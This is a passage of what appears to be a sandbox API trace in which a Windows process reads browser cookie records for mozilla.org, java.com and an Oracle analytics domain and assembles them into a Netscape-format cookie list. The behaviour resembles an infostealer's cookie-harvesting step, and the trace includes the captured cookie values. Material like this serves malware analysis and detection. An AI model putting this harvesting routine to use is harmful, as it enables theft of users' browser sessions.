0x3929d90 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x13 [0160.801] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x392af68 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x50 [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a810 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xa [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929fe0 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0x80 [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a7f8 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xa [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a840 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0xe [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a858 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0xd [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a870 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x9 [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a888 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x392b158 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b158) returned 0xe0 [0160.802] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x392b240 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b240) returned 0x3fc [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b240) returned 0x3fc [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b240) returned 0x3fc [0160.802] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392b240 | out: hHeap=0x2dc0000) returned 1 [0160.802] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b158) returned 0xe0 [0160.802] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392b158 | out: hHeap=0x2dc0000) returned 1 [0160.803] GetProcessHeap () returned 0x8e0000 [0160.803] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xff) returned 0x924fb0 [0160.803] LockFileEx (in: hFile=0x164, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2df328 | out: lpOverlapped=0x2df328) returned 1 [0160.803] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x2df3b8 | out: lpFileSizeHigh=0x2df3b8*=0x0) returned 0x80000 [0160.803] ReadFile (in: hFile=0x160, lpBuffer=0x870b60, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2df3a4, lpOverlapped=0x2df384 | out: lpBuffer=0x870b60*, lpNumberOfBytesRead=0x2df3a4*=0x8000, lpOverlapped=0x2df384) returned 1 [0160.804] _aulldvrm () returned 0x0 [0160.804] lstrlenA (lpString=".mozilla.org") returned 12 [0160.804] lstrlenA (lpString="_ga") returned 3 [0160.804] GetProcessHeap () returned 0x8e0000 [0160.804] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x9250b8 [0160.804] GetProcessHeap () returned 0x8e0000 [0160.804] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x9260c0 [0160.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.804] wsprintfA (in: param_1=0x9260c0, param_2="%li" | out: param_1="1604651427") returned 10 [0160.804] wsprintfA (in: param_1=0x9250b8, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n") returned 68 [0160.804] lstrlenA (lpString="") returned 0 [0160.804] lstrcatA (in: lpString1="", lpString2=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n" [0160.804] VirtualQuery (in: lpAddress=0x9250b8, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.804] GetProcessHeap () returned 0x8e0000 [0160.804] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9250b8 | out: hHeap=0x8e0000) returned 1 [0160.805] _aulldvrm () returned 0x0 [0160.805] lstrlenA (lpString=".mozilla.org") returned 12 [0160.805] lstrlenA (lpString="_gid") returned 4 [0160.805] GetProcessHeap () returned 0x8e0000 [0160.805] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x9250b8 [0160.805] GetProcessHeap () returned 0x8e0000 [0160.805] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x926130 [0160.805] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.805] wsprintfA (in: param_1=0x926130, param_2="%li" | out: param_1="1604651427") returned 10 [0160.805] wsprintfA (in: param_1=0x9250b8, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n") returned 69 [0160.805] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n") returned 68 [0160.805] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n", lpString2=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n" [0160.805] VirtualQuery (in: lpAddress=0x9250b8, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.805] GetProcessHeap () returned 0x8e0000 [0160.805] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9250b8 | out: hHeap=0x8e0000) returned 1 [0160.805] _aulldvrm () returned 0x0 [0160.805] lstrlenA (lpString=".mozilla.org") returned 12 [0160.805] lstrlenA (lpString="_gat_UA-36116321-1") returned 18 [0160.805] GetProcessHeap () returned 0x8e0000 [0160.805] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x9250b8 [0160.805] GetProcessHeap () returned 0x8e0000 [0160.805] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x9261a0 [0160.805] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.805] wsprintfA (in: param_1=0x9261a0, param_2="%li" | out: param_1="1604651427") returned 10 [0160.805] wsprintfA (in: param_1=0x9250b8, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n") returned 58 [0160.805] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n") returned 137 [0160.805] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n", lpString2=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n" [0160.805] VirtualQuery (in: lpAddress=0x9250b8, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.805] GetProcessHeap () returned 0x8e0000 [0160.805] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9250b8 | out: hHeap=0x8e0000) returned 1 [0160.806] _aulldvrm () returned 0x0 [0160.806] lstrlenA (lpString=".java.com") returned 9 [0160.806] lstrlenA (lpString="s_nr") returned 4 [0160.806] GetProcessHeap () returned 0x8e0000 [0160.806] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x9250b8 [0160.806] GetProcessHeap () returned 0x8e0000 [0160.806] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x926210 [0160.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.806] wsprintfA (in: param_1=0x926210, param_2="%li" | out: param_1="1604651427") returned 10 [0160.806] wsprintfA (in: param_1=0x9250b8, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n") returned 53 [0160.806] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n") returned 195 [0160.806] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n", lpString2=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n" [0160.806] VirtualQuery (in: lpAddress=0x9250b8, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.806] GetProcessHeap () returned 0x8e0000 [0160.806] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9250b8 | out: hHeap=0x8e0000) returned 1 [0160.806] _aulldvrm () returned 0x0 [0160.806] lstrlenA (lpString=".java.com") returned 9 [0160.806] lstrlenA (lpString="gpName") returned 6 [0160.806] GetProcessHeap () returned 0x8e0000 [0160.806] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x9250b8 [0160.806] GetProcessHeap () returned 0x8e0000 [0160.806] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x926280 [0160.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.806] wsprintfA (in: param_1=0x926280, param_2="%li" | out: param_1="1604651427") returned 10 [0160.806] wsprintfA (in: param_1=0x9250b8, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n") returned 81 [0160.806] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n") returned 248 [0160.806] GetProcessHeap () returned 0x8e0000 [0160.807] RtlReAllocateHeap (Heap=0x8e0000, Flags=0x8, Ptr=0x924fb0, Size=0x249) returned 0x9262f0 [0160.807] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n", lpString2=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n" [0160.807] VirtualQuery (in: lpAddress=0x9250b8, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.807] GetProcessHeap () returned 0x8e0000 [0160.807] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9250b8 | out: hHeap=0x8e0000) returned 1 [0160.807] _aulldvrm () returned 0x0 [0160.807] lstrlenA (lpString=".java.com") returned 9 [0160.807] lstrlenA (lpString="gpChannel") returned 9 [0160.807] GetProcessHeap () returned 0x8e0000 [0160.807] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x924fb0 [0160.807] GetProcessHeap () returned 0x8e0000 [0160.807] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x925fb8 [0160.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.807] wsprintfA (in: param_1=0x925fb8, param_2="%li" | out: param_1="1604651427") returned 10 [0160.807] wsprintfA (in: param_1=0x924fb0, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n") returned 59 [0160.807] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n") returned 329 [0160.807] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n", lpString2=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n" [0160.807] VirtualQuery (in: lpAddress=0x924fb0, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.807] GetProcessHeap () returned 0x8e0000 [0160.807] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924fb0 | out: hHeap=0x8e0000) returned 1 [0160.807] _aulldvrm () returned 0x0 [0160.807] lstrlenA (lpString=".java.com") returned 9 [0160.807] lstrlenA (lpString="gpServer") returned 8 [0160.807] GetProcessHeap () returned 0x8e0000 [0160.807] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x924fb0 [0160.807] GetProcessHeap () returned 0x8e0000 [0160.807] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x926028 [0160.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.808] wsprintfA (in: param_1=0x926028, param_2="%li" | out: param_1="1604651427") returned 10 [0160.808] wsprintfA (in: param_1=0x924fb0, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n") returned 52 [0160.808] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n") returned 388 [0160.808] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n", lpString2=".java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n" [0160.808] VirtualQuery (in: lpAddress=0x924fb0, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.808] GetProcessHeap () returned 0x8e0000 [0160.808] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924fb0 | out: hHeap=0x8e0000) returned 1 [0160.808] _aulldvrm () returned 0x0 [0160.808] lstrlenA (lpString=".oracle.112.2o7.net") returned 19 [0160.808] lstrlenA (lpString="s_vi") returned 4 [0160.808] GetProcessHeap () returned 0x8e0000 [0160.808] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x924fb0 [0160.808] GetProcessHeap () returned 0x8e0000 [0160.808] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x926548 [0160.808] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.808] wsprintfA (in: param_1=0x926548, param_2="%li" | out: param_1="1604651427") returned 10 [0160.808] wsprintfA (in: param_1=0x924fb0, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1=".oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\n") returned 94 [0160.808] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n") returned 440 [0160.808] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n", lpString2=".oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\n" | out: 